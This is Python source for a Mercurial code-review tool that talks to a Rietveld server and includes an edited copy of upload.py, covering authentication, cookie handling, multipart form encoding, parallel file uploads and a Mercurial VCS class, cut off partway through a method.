def IsRietveldSubmitted(ui, clname, hex):
    """Report whether Rietveld issue clname carries a '*** Submitted as ***'
    message naming a revision that is a prefix of hex."""
    resp = JSONGet(ui, "/api/" + clname + "?messages=true")
    if resp is None:
        return False
    pattern = re.compile('\*\*\* Submitted as [^*]*?([0-9a-f]+) \*\*\*')
    for msg in resp.get("messages", []):
        m = pattern.match(msg.get("text", ""))
        # Require at least 8 hex digits to avoid accidental prefix matches.
        if m is not None and len(m.group(1)) >= 8 and hex.startswith(m.group(1)):
            return True
    return False
def IsRietveldMailed(cl):
    """Report whether the Rietveld issue for cl has already been mailed
    out for review (contains the standard review-request message)."""
    for msg in cl.dict.get("messages", []):
        if "I'd like you to review this change" in msg.get("text", ""):
            return True
    return False
def DownloadCL(ui, repo, clname):
    """Fetch CL metadata and its most recent patch set from the server.

    Returns (cl, vers, diffdata, err): the CL object, the base revision
    the diff was computed against ("" if unknown), the raw diff text,
    and an error string ("" on success; the other values are None on
    failure).
    """
    set_status("downloading CL " + clname)
    cl, err = LoadCL(ui, repo, clname, web=True)
    if err != "":
        return None, None, None, "error loading CL %s: %s" % (clname, err)

    # Find most recent diff
    diffs = cl.dict.get("patchsets", [])
    if not diffs:
        return None, None, None, "CL has no patch sets"
    patchid = diffs[-1]

    patchset = JSONGet(ui, "/api/" + clname + "/" + str(patchid))
    if patchset is None:
        return None, None, None, "error loading CL patchset %s/%d" % (clname, patchid)
    if patchset.get("patchset", 0) != patchid:
        return None, None, None, "malformed patchset information"

    # The patch set message records the base revision the diff was
    # computed against, as "diff -r <vers> ...".
    vers = ""
    msg = patchset.get("message", "").split()
    if len(msg) >= 3 and msg[0] == "diff" and msg[1] == "-r":
        vers = msg[2]
    diff = "/download/issue" + clname + "_" + str(patchid) + ".diff"
    diffdata = MySend(diff, force_auth=False)

    # Print warning if email is not in CONTRIBUTORS file.
    email = cl.dict.get("owner_email", "")
    if not email:
        return None, None, None, "cannot find owner for %s" % (clname)
    him = FindContributor(ui, repo, email)
    me = FindContributor(ui, repo, None)
    if him == me:
        cl.mailed = IsRietveldMailed(cl)
    else:
        # Someone else's CL: remember the owner for Committer attribution.
        cl.copied_from = email

    return cl, vers, diffdata, ""
def MySend(request_path, payload=None,
        content_type="application/octet-stream",
        timeout=None, force_auth=True,
        **kwargs):
    """Run MySend1 maybe twice, because Rietveld is unreliable."""
    try:
        return MySend1(request_path, payload, content_type, timeout, force_auth, **kwargs)
    except Exception, e:
        if type(e) != urllib2.HTTPError or e.code != 500:  # only retry on HTTP 500 error
            raise
        print >>sys.stderr, "Loading "+request_path+": "+ExceptionDetail()+"; trying again in 2 seconds."
        time.sleep(2)
        # Second (final) attempt; any exception propagates to the caller.
        return MySend1(request_path, payload, content_type, timeout, force_auth, **kwargs)
# Like upload.py Send but only authenticates when the
# redirect is to www.google.com/accounts. This keeps
# unnecessary redirects from happening during testing.
def MySend1(request_path, payload=None,
        content_type="application/octet-stream",
        timeout=None, force_auth=True,
        **kwargs):
    """Sends an RPC and returns the response.

    Args:
        request_path: The path to send the request to, eg /api/appversion/create.
        payload: The body of the request, or None to send an empty request.
        content_type: The Content-Type header to use.
        timeout: timeout in seconds; default None i.e. no timeout.
            (Note: for large requests on OS X, the timeout doesn't work right.)
        kwargs: Any keyword arguments are converted into query string parameters.

    Returns:
        The response body, as a string.
    """
    # TODO: Don't require authentication. Let the server say
    # whether it is necessary.
    global rpc
    if rpc == None:
        # Lazily create the shared RPC server on first use.
        rpc = GetRpcServer(upload_options)
    self = rpc
    if not self.authenticated and force_auth:
        self._Authenticate()
    if request_path is None:
        return

    # Apply the requested socket timeout for this call only; restore
    # the previous default afterward.
    old_timeout = socket.getdefaulttimeout()
    socket.setdefaulttimeout(timeout)
    try:
        tries = 0
        while True:
            tries += 1
            args = dict(kwargs)
            url = "http://%s%s" % (self.host, request_path)
            if args:
                url += "?" + urllib.urlencode(args)
            req = self._CreateRequest(url=url, data=payload)
            req.add_header("Content-Type", content_type)
            try:
                f = self.opener.open(req)
                response = f.read()
                f.close()
                # Translate \r\n into \n, because Rietveld doesn't.
                response = response.replace('\r\n', '\n')
                # who knows what urllib will give us
                if type(response) == unicode:
                    response = response.encode("utf-8")
                typecheck(response, str)
                return response
            except urllib2.HTTPError, e:
                if tries > 3:
                    raise
                elif e.code == 401:
                    # Unauthorized: authenticate and retry.
                    self._Authenticate()
                elif e.code == 302:
                    # Only a redirect to the Google accounts ServiceLogin
                    # page counts as an authentication request.
                    loc = e.info()["location"]
                    if not loc.startswith('https://www.google.com/a') or loc.find('/ServiceLogin') < 0:
                        return ''
                    self._Authenticate()
                else:
                    raise
    finally:
        socket.setdefaulttimeout(old_timeout)
def GetForm(url):
    """Fetch url and return its HTML form fields as a dict mapping
    UTF-8-encoded field names to values with \\r\\n normalized to \\n."""
    parser = FormParser()
    parser.feed(ustr(MySend(url)))  # feed wants unicode
    parser.close()
    # convert back to utf-8 to restore sanity
    fields = {}
    for key, value in parser.map.items():
        fields[key.encode("utf-8")] = value.replace("\r\n", "\n").encode("utf-8")
    return fields
def EditDesc(issue, subject=None, desc=None, reviewers=None, cc=None, closed=False, private=False):
    """Edit the metadata of a Rietveld issue via its web edit form.

    Only the fields passed as non-None/true are changed; all other form
    fields are resubmitted with their current server-side values.
    Exits the process (status 2) if the server reports an error.
    """
    set_status("uploading change to description")
    form_fields = GetForm("/" + issue + "/edit")
    if subject is not None:
        form_fields['subject'] = subject
    if desc is not None:
        form_fields['description'] = desc
    if reviewers is not None:
        form_fields['reviewers'] = reviewers
    if cc is not None:
        form_fields['cc'] = cc
    if closed:
        form_fields['closed'] = "checked"
    if private:
        form_fields['private'] = "checked"
    ctype, body = EncodeMultipartFormData(form_fields.items(), [])
    response = MySend("/" + issue + "/edit", body, content_type=ctype)
    if response != "":
        # A non-empty response is an error page from the server.
        print >>sys.stderr, "Error editing description:\n" + "Sent form: \n", form_fields, "\n", response
        sys.exit(2)
def PostMessage(ui, issue, message, reviewers=None, cc=None, send_mail=True, subject=None):
set_status("uploading message")
form_fields = GetForm("/" + issue + "/publish")
if reviewers is not None:
form_fields['reviewers'] = reviewers
if cc is not None:
form_fields['cc'] = cc
if send_mail:
form_fields['send_mail'] = "checked"
else:
del form_fields['send_mail']
if subject is not None:
form_fields['subject'] = subject
form_fields['message'] = message
form_fields['message_only'] = '1' # Don't include draft comments
if reviewers is not None or cc is not None:
form_fields['message_only'] = '' # Must set '' in order to override cc/reviewer
ctype = "applications/x-www-form-urlencoded"
body = urllib.urlencode(form_fields)
response = MySend("/" + issue + "/publish", body, content_type=ctype)
if response != "":
print response
sys.exit(2)
class opt(object):
    # Empty attribute bag used by RietveldSetup to build the options
    # object that upload.py's RPC machinery expects.
    pass
def RietveldSetup(ui, repo):
    # Initialize the global Rietveld state (server address, upload
    # options, release branch) from the Mercurial configuration.
    global force_google_account
    global rpc
    global server
    global server_url_base
    global upload_options
    global verbosity

    if not ui.verbose:
        verbosity = 0

    # Config options.
    x = ui.config("codereview", "server")
    if x is not None:
        server = x

    # TODO(rsc): Take from ui.username?
    email = None
    x = ui.config("codereview", "email")
    if x is not None:
        email = x

    server_url_base = "http://" + server + "/"

    testing = ui.config("codereview", "testing")
    force_google_account = ui.configbool("codereview", "force_google_account", False)

    # Build the options object expected by upload.py's GetRpcServer.
    upload_options = opt()
    upload_options.email = email
    upload_options.host = None
    upload_options.verbose = 0
    upload_options.description = None
    upload_options.description_file = None
    upload_options.reviewers = None
    upload_options.cc = None
    upload_options.message = None
    upload_options.issue = None
    upload_options.download_base = False
    upload_options.revision = None
    upload_options.send_mail = False
    upload_options.vcs = None
    upload_options.server = server
    upload_options.save_cookies = True

    if testing:
        upload_options.save_cookies = False
        upload_options.email = "test@example.com"

    # The RPC connection is created lazily by MySend1.
    rpc = None

    # Remember the newest release branch; tags sort lexically, so the
    # last matching tag wins.
    global releaseBranch
    tags = repo.branchtags().keys()
    if 'release-branch.r100' in tags:
        # NOTE(rsc): This tags.sort is going to get the wrong
        # answer when comparing release-branch.r99 with
        # release-branch.r100. If we do ten releases a year
        # that gives us 4 years before we have to worry about this.
        raise hg_util.Abort('tags.sort needs to be fixed for release-branch.r100')
    tags.sort()
    for t in tags:
        if t.startswith('release-branch.'):
            releaseBranch = t
#######################################################################
# http://codereview.appspot.com/static/upload.py, heavily edited.
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tool for uploading diffs from a version control system to the codereview app.
Usage summary: upload.py [options] [-- diff_options]
Diff options are passed to the diff command of the underlying system.
Supported version control systems:
Git
Mercurial
Subversion
It is important for Git/Mercurial users to specify a tree/node/branch to diff
against by using the '--rev' option.
"""
# This code is derived from appcfg.py in the App Engine SDK (open source),
# and from ASPN recipe #146306.
import cookielib
import getpass
import logging
import mimetypes
import optparse
import os
import re
import socket
import subprocess
import sys
import urllib
import urllib2
import urlparse
# The md5 module was deprecated in Python 2.5.
try:
from hashlib import md5
except ImportError:
from md5 import md5
try:
import readline
except ImportError:
pass
# The logging verbosity:
#   0: Errors only.
#   1: Status messages.
#   2: Info logs.
#   3: Debug logs.
verbosity = 1

# Max size of patch or base file.
MAX_UPLOAD_SIZE = 900 * 1024

# whitelist for non-binary filetypes which do not start with "text/"
# .mm (Objective-C) shows up as application/x-freemind on my Linux box.
TEXT_MIMETYPES = [
    'application/javascript',
    'application/x-javascript',
    'application/x-freemind'
]
def GetEmail(prompt):
    """Prompts the user for their email address and returns it.

    The last used email address is saved to a file and offered up as a
    suggestion to the user. If the user presses enter without typing in
    anything the last used email address is used. If the user enters a new
    address, it is saved for next time we prompt.
    """
    last_email_file_name = os.path.expanduser("~/.last_codereview_email_address")
    last_email = ""
    if os.path.exists(last_email_file_name):
        try:
            last_email_file = open(last_email_file_name, "r")
            last_email = last_email_file.readline().strip("\n")
            last_email_file.close()
            prompt += " [%s]" % last_email
        except IOError, e:
            # Best effort: an unreadable cache file just means no suggestion.
            pass
    email = raw_input(prompt + ": ").strip()
    if email:
        try:
            last_email_file = open(last_email_file_name, "w")
            last_email_file.write(email)
            last_email_file.close()
        except IOError, e:
            # Best effort: failing to persist the address is not fatal.
            pass
    else:
        # Empty input means "accept the suggested last-used address".
        email = last_email
    return email
def StatusUpdate(msg):
    """Print a status message to stdout.

    If the module-level 'verbosity' is greater than 0, print the message.

    Args:
      msg: The string to print.
    """
    if verbosity > 0:
        print msg
def ErrorExit(msg):
    """Print an error message to stderr and exit with status 1."""
    print >>sys.stderr, msg
    sys.exit(1)
class ClientLoginError(urllib2.HTTPError):
    """Raised to indicate there was an error authenticating with ClientLogin."""

    def __init__(self, url, code, msg, headers, args):
        # ClientLogin reports failures as key=value pairs; the "Error" key
        # holds the machine-readable reason (e.g. "BadAuthentication").
        urllib2.HTTPError.__init__(self, url, code, msg, headers, None)
        self.args = args
        self.reason = args["Error"]
class AbstractRpcServer(object):
    """Provides a common interface for a simple RPC server."""

    def __init__(self, host, auth_function, host_override=None, extra_headers={}, save_cookies=False):
        """Creates a new HttpRpcServer.

        Args:
          host: The host to send requests to.
          auth_function: A function that takes no arguments and returns an
            (email, password) tuple when called. Will be called if authentication
            is required.
          host_override: The host header to send to the server (defaults to host).
          extra_headers: A dict of extra headers to append to every request.
          save_cookies: If True, save the authentication cookies to local disk.
            If False, use an in-memory cookiejar instead. Subclasses must
            implement this functionality. Defaults to False.
        """
        self.host = host
        self.host_override = host_override
        self.auth_function = auth_function
        self.authenticated = False
        # NOTE(review): mutable default for extra_headers is shared across
        # instances; harmless as long as callers never mutate it in place.
        self.extra_headers = extra_headers
        self.save_cookies = save_cookies
        self.opener = self._GetOpener()
        if self.host_override:
            logging.info("Server: %s; Host: %s", self.host, self.host_override)
        else:
            logging.info("Server: %s", self.host)

    def _GetOpener(self):
        """Returns an OpenerDirector for making HTTP requests.

        Returns:
          A urllib2.OpenerDirector object.
        """
        raise NotImplementedError()

    def _CreateRequest(self, url, data=None):
        """Creates a new urllib request with the configured extra headers."""
        logging.debug("Creating request for: '%s' with payload:\n%s", url, data)
        req = urllib2.Request(url, data=data)
        if self.host_override:
            req.add_header("Host", self.host_override)
        for key, value in self.extra_headers.iteritems():
            req.add_header(key, value)
        return req

    def _GetAuthToken(self, email, password):
        """Uses ClientLogin to authenticate the user, returning an auth token.

        Args:
          email: The user's email address
          password: The user's password

        Raises:
          ClientLoginError: If there was an error authenticating with ClientLogin.
          HTTPError: If there was some other form of HTTP error.

        Returns:
          The authentication token returned by ClientLogin.
        """
        account_type = "GOOGLE"
        # NOTE(review): force_google_account is a module-level flag defined
        # elsewhere in this tool; not visible in this chunk -- confirm.
        if self.host.endswith(".google.com") and not force_google_account:
            # Needed for use inside Google.
            account_type = "HOSTED"
        req = self._CreateRequest(
            url="https://www.google.com/accounts/ClientLogin",
            data=urllib.urlencode({
                "Email": email,
                "Passwd": password,
                "service": "ah",
                "source": "rietveld-codereview-upload",
                "accountType": account_type,
            }),
        )
        try:
            response = self.opener.open(req)
            response_body = response.read()
            # Response is newline-separated key=value pairs; "Auth" is the token.
            response_dict = dict(x.split("=") for x in response_body.split("\n") if x)
            return response_dict["Auth"]
        except urllib2.HTTPError, e:
            if e.code == 403:
                # 403 carries a parsable ClientLogin error body.
                body = e.read()
                response_dict = dict(x.split("=", 1) for x in body.split("\n") if x)
                raise ClientLoginError(req.get_full_url(), e.code, e.msg, e.headers, response_dict)
            else:
                raise

    def _GetAuthCookie(self, auth_token):
        """Fetches authentication cookies for an authentication token.

        Args:
          auth_token: The authentication token returned by ClientLogin.

        Raises:
          HTTPError: If there was an error fetching the authentication cookies.
        """
        # This is a dummy value to allow us to identify when we're successful.
        continue_location = "http://localhost/"
        args = {"continue": continue_location, "auth": auth_token}
        req = self._CreateRequest("http://%s/_ah/login?%s" % (self.host, urllib.urlencode(args)))
        try:
            response = self.opener.open(req)
        except urllib2.HTTPError, e:
            # The opener ignores redirects, so a 302 arrives as an HTTPError;
            # inspect it below like a normal response.
            response = e
        if (response.code != 302 or
                response.info()["location"] != continue_location):
            raise urllib2.HTTPError(req.get_full_url(), response.code, response.msg, response.headers, response.fp)
        self.authenticated = True

    def _Authenticate(self):
        """Authenticates the user.

        The authentication process works as follows:
         1) We get a username and password from the user
         2) We use ClientLogin to obtain an AUTH token for the user
            (see http://code.google.com/apis/accounts/AuthForInstalledApps.html).
         3) We pass the auth token to /_ah/login on the server to obtain an
            authentication cookie. If login was successful, it tries to redirect
            us to the URL we provided.

        If we attempt to access the upload API without first obtaining an
        authentication cookie, it returns a 401 response (or a 302) and
        directs us to authenticate ourselves with ClientLogin.
        """
        # Up to three attempts; only "BadAuthentication" re-prompts, every
        # other ClientLogin failure aborts with a message or re-raises.
        for i in range(3):
            credentials = self.auth_function()
            try:
                auth_token = self._GetAuthToken(credentials[0], credentials[1])
            except ClientLoginError, e:
                if e.reason == "BadAuthentication":
                    print >>sys.stderr, "Invalid username or password."
                    continue
                if e.reason == "CaptchaRequired":
                    print >>sys.stderr, (
                        "Please go to\n"
                        "https://www.google.com/accounts/DisplayUnlockCaptcha\n"
                        "and verify you are a human. Then try again.")
                    break
                if e.reason == "NotVerified":
                    print >>sys.stderr, "Account not verified."
                    break
                if e.reason == "TermsNotAgreed":
                    print >>sys.stderr, "User has not agreed to TOS."
                    break
                if e.reason == "AccountDeleted":
                    print >>sys.stderr, "The user account has been deleted."
                    break
                if e.reason == "AccountDisabled":
                    print >>sys.stderr, "The user account has been disabled."
                    break
                if e.reason == "ServiceDisabled":
                    print >>sys.stderr, "The user's access to the service has been disabled."
                    break
                if e.reason == "ServiceUnavailable":
                    print >>sys.stderr, "The service is not available; try again later."
                    break
                raise
            self._GetAuthCookie(auth_token)
            return

    def Send(self, request_path, payload=None,
             content_type="application/octet-stream",
             timeout=None,
             **kwargs):
        """Sends an RPC and returns the response.

        Args:
          request_path: The path to send the request to, eg /api/appversion/create.
          payload: The body of the request, or None to send an empty request.
          content_type: The Content-Type header to use.
          timeout: timeout in seconds; default None i.e. no timeout.
            (Note: for large requests on OS X, the timeout doesn't work right.)
          kwargs: Any keyword arguments are converted into query string parameters.

        Returns:
          The response body, as a string.
        """
        # TODO: Don't require authentication.  Let the server say
        # whether it is necessary.
        if not self.authenticated:
            self._Authenticate()
        # The socket default timeout is process-global; save and restore it.
        old_timeout = socket.getdefaulttimeout()
        socket.setdefaulttimeout(timeout)
        try:
            tries = 0
            while True:
                tries += 1
                args = dict(kwargs)
                url = "http://%s%s" % (self.host, request_path)
                if args:
                    url += "?" + urllib.urlencode(args)
                req = self._CreateRequest(url=url, data=payload)
                req.add_header("Content-Type", content_type)
                try:
                    f = self.opener.open(req)
                    response = f.read()
                    f.close()
                    return response
                except urllib2.HTTPError, e:
                    if tries > 3:
                        raise
                    elif e.code == 401 or e.code == 302:
                        # Auth cookie expired or missing: re-authenticate and retry.
                        self._Authenticate()
                    else:
                        raise
        finally:
            socket.setdefaulttimeout(old_timeout)
class HttpRpcServer(AbstractRpcServer):
    """Provides a simplified RPC-style interface for HTTP requests."""

    def _Authenticate(self):
        """Save the cookie jar after authentication."""
        super(HttpRpcServer, self)._Authenticate()
        if self.save_cookies:
            StatusUpdate("Saving authentication cookies to %s" % self.cookie_file)
            self.cookie_jar.save()

    def _GetOpener(self):
        """Returns an OpenerDirector that supports cookies and ignores redirects.

        Returns:
          A urllib2.OpenerDirector object.
        """
        # Hand-assemble the opener so that HTTPRedirectHandler is deliberately
        # left out: _GetAuthCookie relies on seeing the raw 302.
        opener = urllib2.OpenerDirector()
        opener.add_handler(urllib2.ProxyHandler())
        opener.add_handler(urllib2.UnknownHandler())
        opener.add_handler(urllib2.HTTPHandler())
        opener.add_handler(urllib2.HTTPDefaultErrorHandler())
        opener.add_handler(urllib2.HTTPSHandler())
        opener.add_handler(urllib2.HTTPErrorProcessor())
        if self.save_cookies:
            # NOTE(review): 'server' here is a module-level global defined
            # elsewhere in this tool (not self.host) -- confirm in full file.
            self.cookie_file = os.path.expanduser("~/.codereview_upload_cookies_" + server)
            self.cookie_jar = cookielib.MozillaCookieJar(self.cookie_file)
            if os.path.exists(self.cookie_file):
                try:
                    self.cookie_jar.load()
                    self.authenticated = True
                    StatusUpdate("Loaded authentication cookies from %s" % self.cookie_file)
                except (cookielib.LoadError, IOError):
                    # Failed to load cookies - just ignore them.
                    pass
            else:
                # Create an empty cookie file with mode 600
                fd = os.open(self.cookie_file, os.O_CREAT, 0600)
                os.close(fd)
            # Always chmod the cookie file
            os.chmod(self.cookie_file, 0600)
        else:
            # Don't save cookies across runs of update.py.
            self.cookie_jar = cookielib.CookieJar()
        opener.add_handler(urllib2.HTTPCookieProcessor(self.cookie_jar))
        return opener
def GetRpcServer(options):
    """Returns an instance of an AbstractRpcServer.

    Returns:
      A new AbstractRpcServer, on which RPC calls can be made.
    """
    rpc_server_class = HttpRpcServer

    def GetUserCredentials():
        """Prompts the user for a username and password."""
        # Disable status prints so they don't obscure the password prompt.
        # NOTE(review): global_status is a module-level global defined
        # elsewhere in this tool; not visible in this chunk.
        global global_status
        st = global_status
        global_status = None
        email = options.email
        if email is None:
            email = GetEmail("Email (login for uploading to %s)" % options.server)
        password = getpass.getpass("Password for %s: " % email)
        # Put status back.
        global_status = st
        return (email, password)

    # If this is the dev_appserver, use fake authentication.
    host = (options.host or options.server).lower()
    if host == "localhost" or host.startswith("localhost:"):
        email = options.email
        if email is None:
            email = "test@example.com"
            logging.info("Using debug user %s. Override with --email" % email)
        server = rpc_server_class(
            options.server,
            lambda: (email, "password"),
            host_override=options.host,
            extra_headers={"Cookie": 'dev_appserver_login="%s:False"' % email},
            save_cookies=options.save_cookies)
        # Don't try to talk to ClientLogin.
        server.authenticated = True
        return server

    return rpc_server_class(options.server, GetUserCredentials,
                            host_override=options.host, save_cookies=options.save_cookies)
def EncodeMultipartFormData(fields, files):
    """Encode form fields for multipart/form-data.

    Args:
      fields: A sequence of (name, value) elements for regular form fields.
      files: A sequence of (name, filename, value) elements for data to be
        uploaded as files.

    Returns:
      (content_type, body) ready for httplib.HTTP instance.

    Source:
      http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/146306
    """
    BOUNDARY = '-M-A-G-I-C---B-O-U-N-D-A-R-Y-'
    CRLF = '\r\n'
    parts = []
    # Plain form fields: one part per (name, value) pair.
    for (name, val) in fields:
        typecheck(name, str)
        typecheck(val, str)
        parts.extend([
            '--' + BOUNDARY,
            'Content-Disposition: form-data; name="%s"' % name,
            '',
            val,
        ])
    # File parts additionally carry a filename and a guessed Content-Type.
    for (name, fname, val) in files:
        typecheck(name, str)
        typecheck(fname, str)
        typecheck(val, str)
        parts.extend([
            '--' + BOUNDARY,
            'Content-Disposition: form-data; name="%s"; filename="%s"' % (name, fname),
            'Content-Type: %s' % GetContentType(fname),
            '',
            val,
        ])
    # Closing boundary plus a trailing CRLF.
    parts.append('--' + BOUNDARY + '--')
    parts.append('')
    content_type = 'multipart/form-data; boundary=%s' % BOUNDARY
    return content_type, CRLF.join(parts)
def GetContentType(filename):
    """Helper to guess the content-type from the filename."""
    guessed, _ = mimetypes.guess_type(filename)
    if guessed is None:
        # Unknown extension: fall back to the generic binary type.
        return 'application/octet-stream'
    return guessed
# Use a shell for subcommands on Windows to get a PATH search.
# (On other platforms the argument list is executed directly.)
use_shell = sys.platform.startswith("win")
def RunShellWithReturnCode(command, print_output=False,
                           universal_newlines=True, env=os.environ):
    """Executes a command and returns the output from stdout and the return code.

    Args:
      command: Command to execute.
      print_output: If True, the output is printed to stdout.
        If False, both stdout and stderr are ignored.
      universal_newlines: Use universal_newlines flag (default: True).

    Returns:
      Tuple (output, return code)
    """
    logging.info("Running %s", command)
    p = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                         shell=use_shell, universal_newlines=universal_newlines, env=env)
    if print_output:
        # Echo stdout line by line while also capturing it.
        output_array = []
        while True:
            line = p.stdout.readline()
            if not line:
                break
            print line.strip("\n")
            output_array.append(line)
        output = "".join(output_array)
    else:
        output = p.stdout.read()
    p.wait()
    # stderr is read only after the process exits; echoed when print_output.
    errout = p.stderr.read()
    if print_output and errout:
        print >>sys.stderr, errout
    p.stdout.close()
    p.stderr.close()
    return output, p.returncode
def RunShell(command, silent_ok=False, universal_newlines=True,
             print_output=False, env=os.environ):
    """Run *command* and return its stdout; exit on failure or empty output."""
    output, code = RunShellWithReturnCode(command, print_output,
                                          universal_newlines, env)
    if code:
        ErrorExit("Got error status from %s:\n%s" % (command, output))
    # Empty output is an error unless the caller opted out with silent_ok.
    if not (silent_ok or output):
        ErrorExit("No output from %s" % command)
    return output
class VersionControlSystem(object):
    """Abstract base class providing an interface to the VCS."""

    def __init__(self, options):
        """Constructor.

        Args:
          options: Command line options.
        """
        self.options = options

    def GenerateDiff(self, args):
        """Return the current diff as a string.

        Args:
          args: Extra arguments to pass to the diff command.
        """
        raise NotImplementedError(
            "abstract method -- subclass %s must override" % self.__class__)

    def GetUnknownFiles(self):
        """Return a list of files unknown to the VCS."""
        raise NotImplementedError(
            "abstract method -- subclass %s must override" % self.__class__)

    def CheckForUnknownFiles(self):
        """Show an "are you sure?" prompt if there are unknown files."""
        unknown_files = self.GetUnknownFiles()
        if unknown_files:
            print "The following files are not added to version control:"
            for line in unknown_files:
                print line
            prompt = "Are you sure to continue?(y/N) "
            answer = raw_input(prompt).strip()
            if answer != "y":
                ErrorExit("User aborted")

    def GetBaseFile(self, filename):
        """Get the content of the upstream version of a file.

        Returns:
          A tuple (base_content, new_content, is_binary, status)
            base_content: The contents of the base file.
            new_content: For text files, this is empty.  For binary files, this is
              the contents of the new file, since the diff output won't contain
              information to reconstruct the current file.
            is_binary: True iff the file is binary.
            status: The status of the file.
        """
        raise NotImplementedError(
            "abstract method -- subclass %s must override" % self.__class__)

    def GetBaseFiles(self, diff):
        """Helper that calls GetBase file for each file in the patch.

        Returns:
          A dictionary that maps from filename to GetBaseFile's tuple.  Filenames
          are retrieved based on lines that start with "Index:" or
          "Property changes on:".
        """
        files = {}
        for line in diff.splitlines(True):
            if line.startswith('Index:') or line.startswith('Property changes on:'):
                unused, filename = line.split(':', 1)
                # On Windows if a file has property changes its filename uses '\'
                # instead of '/'.
                filename = to_slash(filename.strip())
                files[filename] = self.GetBaseFile(filename)
        return files

    def UploadBaseFiles(self, issue, rpc_server, patch_list, patchset, options,
                        files):
        """Uploads the base files (and if necessary, the current ones as well)."""

        def UploadFile(filename, file_id, content, is_binary, status, is_base):
            """Uploads a file to the server."""
            # NOTE(review): set_status is a module-level helper defined
            # elsewhere in this tool; not visible in this chunk.
            set_status("uploading " + filename)
            file_too_large = False
            if is_base:
                type = "base"
            else:
                type = "current"
            if len(content) > MAX_UPLOAD_SIZE:
                print ("Not uploading the %s file for %s because it's too large." %
                       (type, filename))
                file_too_large = True
                content = ""
            checksum = md5(content).hexdigest()
            if options.verbose > 0 and not file_too_large:
                print "Uploading %s file for %s" % (type, filename)
            url = "/%d/upload_content/%d/%d" % (int(issue), int(patchset), file_id)
            form_fields = [
                ("filename", filename),
                ("status", status),
                ("checksum", checksum),
                ("is_binary", str(is_binary)),
                ("is_current", str(not is_base)),
            ]
            if file_too_large:
                form_fields.append(("file_too_large", "1"))
            if options.email:
                form_fields.append(("user", options.email))
            ctype, body = EncodeMultipartFormData(form_fields, [("data", filename, content)])
            response_body = rpc_server.Send(url, body, content_type=ctype)
            if not response_body.startswith("OK"):
                StatusUpdate(" --> %s" % response_body)
                sys.exit(1)

        # Don't want to spawn too many threads, nor do we want to
        # hit Rietveld too hard, or it will start serving 500 errors.
        # When 8 works, it's no better than 4, and sometimes 8 is
        # too many for Rietveld to handle.
        MAX_PARALLEL_UPLOADS = 4

        # NOTE(review): 'threading' is not among this chunk's visible imports;
        # presumably imported elsewhere in the full file -- confirm.
        sema = threading.BoundedSemaphore(MAX_PARALLEL_UPLOADS)
        upload_threads = []
        finished_upload_threads = []

        class UploadFileThread(threading.Thread):
            def __init__(self, args):
                threading.Thread.__init__(self)
                self.args = args
            def run(self):
                UploadFile(*self.args)
                # Record completion so StartUploadFile can reap this thread.
                finished_upload_threads.append(self)
                sema.release()

        def StartUploadFile(*args):
            # Blocks until an upload slot is free, reaping finished threads.
            sema.acquire()
            while len(finished_upload_threads) > 0:
                t = finished_upload_threads.pop()
                upload_threads.remove(t)
                t.join()
            t = UploadFileThread(args)
            upload_threads.append(t)
            t.start()

        def WaitForUploads():
            for t in upload_threads:
                t.join()

        # Invert patch_list into {filename: patch_key}.
        patches = dict()
        [patches.setdefault(v, k) for k, v in patch_list]
        for filename in patches.keys():
            base_content, new_content, is_binary, status = files[filename]
            file_id_str = patches.get(filename)
            if file_id_str.find("nobase") != -1:
                # "nobase" marker: the server does not want the base file.
                base_content = None
                file_id_str = file_id_str[file_id_str.rfind("_") + 1:]
            file_id = int(file_id_str)
            if base_content != None:
                StartUploadFile(filename, file_id, base_content, is_binary, status, True)
            if new_content != None:
                StartUploadFile(filename, file_id, new_content, is_binary, status, False)
        WaitForUploads()

    def IsImage(self, filename):
        """Returns true if the filename has an image extension."""
        mimetype = mimetypes.guess_type(filename)[0]
        if not mimetype:
            return False
        return mimetype.startswith("image/")

    def IsBinary(self, filename):
        """Returns true if the guessed mimetype isn't in the text group."""
        mimetype = mimetypes.guess_type(filename)[0]
        if not mimetype:
            return False  # e.g. README, "real" binaries usually have an extension
        # special case for text files which don't start with text/
        if mimetype in TEXT_MIMETYPES:
            return False
        return not mimetype.startswith("text/")
class FakeMercurialUI(object):
    """Minimal stand-in for a Mercurial ui object that buffers its output."""

    def __init__(self):
        # Mercurial consults 'quiet'; 'output' accumulates everything written.
        self.quiet = True
        self.output = ''

    def write(self, *args, **opts):
        # Join the fragments with spaces, exactly like the write() it replaces.
        self.output = self.output + ' '.join(args)

    def copy(self):
        # Mercurial copies the ui; sharing a single buffer is fine here.
        return self

    def status(self, *args, **opts):
        pass

    def readconfig(self, *args, **opts):
        pass

    def expandpath(self, *args, **opts):
        # Delegate to the real ui held in the module-level global.
        return global_ui.expandpath(*args, **opts)

    def configitems(self, *args, **opts):
        return global_ui.configitems(*args, **opts)

    def config(self, *args, **opts):
        return global_ui.config(*args, **opts)
use_hg_shell = False # set to True to shell out to hg always; slower
class MercurialVCS(VersionControlSystem):
    """Implementation of the VersionControlSystem interface for Mercurial."""

    def __init__(self, options, ui, repo):
        super(MercurialVCS, self).__init__(options)
        self.ui = ui
        self.repo = repo
        # Cache of "hg status" output, filled lazily by get_hg_status().
        self.status = None
        # Absolute path to repository (we can be in a subdir)
        self.repo_dir = os.path.normpath(repo.root)
        # Compute the subdir
        cwd = os.path.normpath(os.getcwd())
        assert cwd.startswith(self.repo_dir)
        self.subdir = cwd[len(self.repo_dir):].lstrip(r"\/")
        if self.options.revision:
            self.base_rev = self.options.revision
        else:
            # Prefer the MQ parent revision when patch queues are in use.
            mqparent, err = RunShellWithReturnCode(['hg', 'log', '--rev', 'qparent', '--template={node}'])
            if not err and mqparent != "":
                self.base_rev = mqparent
            else:
                self.base_rev = RunShell(["hg", "parents", "-q"]).split(':')[1].strip()

    def _GetRelPath(self, filename):
        """Get relative path of a file according to the current directory,
        given its logical path in the repo."""
        assert filename.startswith(self.subdir), (filename, self.subdir)
        return filename[len(self.subdir):].lstrip(r"\/")

    def GenerateDiff(self, extra_args):
